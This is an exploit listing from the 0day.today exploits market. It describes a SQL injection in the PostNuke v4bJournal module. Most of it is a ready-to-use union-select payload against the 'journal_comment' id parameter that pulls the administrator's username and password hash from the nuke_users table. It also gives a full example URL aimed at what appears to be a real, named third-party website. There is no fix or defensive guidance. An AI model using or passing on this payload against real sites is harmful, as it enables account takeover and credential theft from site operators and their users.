[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PostNuke Module v4bJournal Remote SQL Injection Vulnerability

Author
Ali Abbasi
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1817
Category
web applications
Date add
01-05-2007
Platform
unsorted
=============================================================
PostNuke Module v4bJournal Remote SQL Injection Vulnerability
=============================================================




----------------------------------------
PostNuke Journal
----------------------------------------
                                   
                    DISCOVERED BY :Ali Abbasi
Olom Fonon Mazandaran University - Security Research Center, Babol, Iran
       


                                   {SQL BUG}



in 
    index.php?module=v4bJournal&func=journal_comment&id=(SQL)




------------------------------------------

         EXPLIOT BY :ABDUCTER

Greetz For ABDUCTER Real Friend Nanos (Nancy)

 


   index.php?module=v4bJournal&func=journal_comment&id=-1/**/union/**/select/**/0,pn_uname,pn_pass,3,4,pn_uname,6,7,8,9,10,11,12,13,14/**/from/**/nuke_users/**/where/**/pn_uid=2/*

EX:- 
http://www.arsfoodcourt.com/index.php?module=v4bJournal&func=journal_comment&id=-1/**/union/**/select/**/0,pn_uname,pn_pass,3,4,pn_uname,6,7,8,9,10,11,12,13,14/**/from/**/nuke_users/**/where/**/pn_uid=2/*


U must regrister first ( You Most Register First )
-------------------------------------------



#  0day.today [2024-12-25]  #